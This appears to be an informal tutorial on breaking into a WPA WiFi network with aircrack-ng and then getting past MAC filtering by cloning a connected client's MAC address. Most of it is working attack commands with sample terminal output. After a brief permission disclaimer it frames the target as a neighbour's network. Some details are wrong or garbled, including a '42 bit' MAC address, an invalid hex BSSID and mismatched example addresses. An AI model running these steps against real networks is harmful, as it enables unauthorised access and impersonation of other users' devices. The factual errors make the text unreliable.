How to Hack MAC filtering network

Don’t try this on networks on which you lack permission
for penetration testing.
Intro:
MAC:
“MAC is a 42 bit address used to uniquely identify
a device. “
“MAC filtering is a way in which the network
administrator allows only specific mac address to
connect to the router.”
Let’s divide this topic in two threads:
[-] Crack WiFi network.
[-] Get in to it even if MAC filtering is enabled.
Tools:
1-Kali Linux
Rather then downloading this separately and
spending your time configuring the tools,
download “Kali Linux” because it’s the mother of
all possible tools available out there.
2-Wireless card capable of monitoring
If you have both, then let’s start:
Crack a WiFi network:
First disconnect all wireless connections.
Open your terminal:
Command: airmon-ng start [your WLAN card]
If you don’t know the name of your WLAN card, open
terminal type ifconfig and check the name there. All
network adapters will be showing there.
It is usually “wlan0.” So, let’s use wlan0 as network
card name.
Type: airmon-ng start wlan0
Hit Enter.
It will print some thing like this:
Found 6 processes that could cause troub
If airodump-ng, aireplay-ng or airtun-n
a short period of time, you may want to
  PID Name
  661 NetworkManager
  763 wpa_supplicant
1032 avahi-daemon
1036 avahi-daemon
10136 dhclient
10295 dhclient
PHY Interface Driver
phy0 wlan0 iwlwifi
(mac80211 monitor mode
(mac80211 station mode
Now, your network card is in monitor state.
You can see the monitor is enabled on “ wlan0mon”
Command: airodump-ng [monitor interface]
As our monitor interface is " wlan0mon"
Type : airodump-ng wlan0mon
If it gives eror like:
ioctl(SIOCSIWMODE) failed: Device or res
ARP linktype is set to 1 (Ethernet) - e
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE8021
sure RFMON is enabled: run 'airmon-ng s
Sysfs injection support was not found ei
Then use these there commands to correct
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Now you can see all wifi networks in yo
It will be like this:

CH  7 ][ Elapsed: 24 s ][ 2015-09-20 0
BSSID              PWR  Beacons    #Dat
1C:sB:25:4F:93:F3  -44       27
30:B9:21:FB:5E:DB  -64       19
58:3A:35:6A:60:31  -83       27
3A:6C:F5:4E:68:AB  -87        9

The next command is: airodump-ng –bssid [mac of
router] -c [channel ] –write [Out put file name] [monitor
interface]
Get the MAC channel info of your target network from
airodump-ng wlan0mon command’s output.
Lets penetrate neibour:

airodump-ng –bssid 1C:sB:25:4F:93:F3 -c 11 –
write WPAcrack wlan0mon

Hit Enter.
It will look like:

CH 11 ][ Elapsed: 1 min ][ 2015-09-20
BSSID              PWR RXQ  Beacons
1C:sB:25:4F:93:F3  -44 100      716
BSSID              STATION            PW
1C:sB:25:4F:93:F3  18:87:96:11:9B:A8
1C:sB:25:4F:93:F3  70:0B:C0:5F:68:56
1C:sB:25:4F:93:F3  34:23:BA:28:B5:0E
1C:sB:25:4F:93:F3  44:91:DB:A5:66:78

Now, wait for the “hand shake” text to appear on the
terminal.
Congrats! You know have password hashes and time to
crack them. You’ll get passwords in plain text form – be
sure to use your best word list, because this all depends
on your word list .
Open another terminal and don’t close the previous
one, as we need some info from it.

Command:aircrack-ng [captured password hash file
name] -w [word list]
Type:aircrack-ng WPAcrack-01.cap -w wordlist.txt

Now, pray.
If your prayer and the wordlist worked, you got the
password. Now, login to WiFi.
At this point, you might have this question:
Q)Holy crab whats that authentication problem??? What
should I do now??
A)You have to be cool.
This means the MAC filtering is enabled.
Get in to it even the mac filtering is enabled.

CH 11 ][ Elapsed: 1 min ][ 2015-09-20
BSSID              PWR RXQ  Beacons
2C:AB:25:4F:93:F3  -44 100      716
Navigate to the out put of “airodump-ng –
bssid 10:AB:25:4F:93:F3 -c 11 –write
WPAcrack wlan0mon” command you can see mac
address under “STATION”

BSSID              STATION            PW
1C:sB:25:4F:93:F3  18:87:96:11:9B:A8
1C:sB:25:4F:93:F3  70:0B:C0:5F:68:56
1C:sB:25:4F:93:F3  34:23:BA:28:B5:0E
1C:sB:25:4F:93:F3  44:91:DB:A5:66:78

Do you see ’em?
These are the MAC addresses of users connected to the
network.
Now, you might be thinking:

Q)So, let’s cool it?? :/
A) If you are thinking this, then it’s time to use brain.py
xD.

These MAC addresses are allowed to connect to
network. If you have this MAC address, the MAC filter
will not block you.
Time to clone xD

Open terminal:
Command 1: ifconfig wlan0 down
Command 2: ifconfig wlan0 hw ether [desired mac
adress]
Command 3: ifconfig wlan0 up
Choose one of the MAC address from under the station
output. Let’s use 34:23:BA:28:B5:0E
And type:
Command 1: ifconfig wlan0 down
Command 2: ifconfig wlan0 hw
ether 34:23:BA:28:B5:0E
Command 3: ifconfig wlan0 up
Type :ifconfig to conform that your MAC is changed
Now??
Now what man just connected already xD?

Do not use this hack in Pyuntaza. Ok?